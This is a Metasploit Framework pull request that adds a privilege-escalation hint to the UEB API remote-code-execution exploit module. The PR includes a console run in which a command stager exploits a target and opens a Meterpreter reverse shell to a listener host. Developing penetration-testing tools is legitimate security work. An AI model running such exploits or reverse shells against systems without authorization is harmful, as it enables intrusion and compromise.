### PR TITLE
ueb priv esc suggestion

### DIFF
--- a/modules/exploits/linux/http/ueb_api_rce.rb
+++ b/modules/exploits/linux/http/ueb_api_rce.rb
@@ -123,5 +123,11 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{peer} - Sending requests to UEB...")
     execute_cmdstager(:linemax => 120)
   end
+
+  def on_new_session(session)
+    if target.name == 'UEB < 10.1.0'
+      print_good("A privilege escalation exploit can be found 'exploits/linux/local/ueb_bpserverd_privesc'")
+    end
+  end
 end
 


### PR DESCRIPTION
This PR adds a LPE suggestion to the UEB module.
Suggestion from: https://github.com/rapid7/metasploit-framework/pull/10952#issuecomment-442812586
Using the text from: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb#L258

Example run:
```
msf5 > use exploit/linux/http/ueb_api_rce 
msf5 exploit(linux/http/ueb_api_rce) > set target 1
target => 1
msf5 exploit(linux/http/ueb_api_rce) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf5 exploit(linux/http/ueb_api_rce) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress -  19.76% done (164/830 bytes)
[*] Command Stager progress -  39.16% done (325/830 bytes)
[*] Command Stager progress -  56.87% done (472/830 bytes)
[*] Command Stager progress -  74.82% done (621/830 bytes)
[*] Command Stager progress -  92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (914728 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:38760) at 2019-01-09 20:27:06 -0500
[+] A privilege escalation exploit can be found 'exploits/linux/local/ueb_bpserverd_privesc'
[*] Command Stager progress - 126.63% done (1051/830 bytes)

meterpreter > exit

```

Notice the new suggestion at the end!